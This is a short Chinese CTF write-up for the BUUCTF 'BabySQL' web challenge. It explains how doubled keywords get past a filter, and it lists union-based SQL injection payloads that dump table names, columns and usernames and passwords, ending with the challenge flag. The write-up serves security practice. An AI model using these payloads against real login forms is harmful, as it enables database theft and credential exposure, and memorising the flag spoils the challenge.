Buuctf-web-[极客大挑战 2019]BabySQL

打开之后,尝试登录注入没啥用,发现or被过滤了,联合查询,union select 也被过滤了。

?username=1' uniunionon selselectect 1,2,3%23 &password=123

双写被过滤的关键字注入查询

 

 

然后直接爆数据库,发现被过滤了很多关键字,直接双写

?username=1' uniunionon selselectect 1,2,group_concat(table_name)frofromm infoorrmation_schema.tables whwhereere table_schema=database() %23 &password=123

 

 因为是做完写的wp,所以flag是在 b4sql 这个数据的,然后直接爆表名

?username=1' uniunionon selselectect 1,2,group_concat(column_name)frofromm infoorrmation_schema.columns whwhereere table_name='b4bsql'%23 &password=123

 

 爆数据

?username=1' uniunionon selselectect 1,2,group_concat(0x5c,username,0x5c,passwoorrd)frofromm b4bsql%23 &password=123

 

 flag{94233c38-6dcf-42ef-bbd7-d3a3c76978f8}

posted @ 2020-10-11 23:27  夜布多  阅读(237)  评论(0编辑  收藏  举报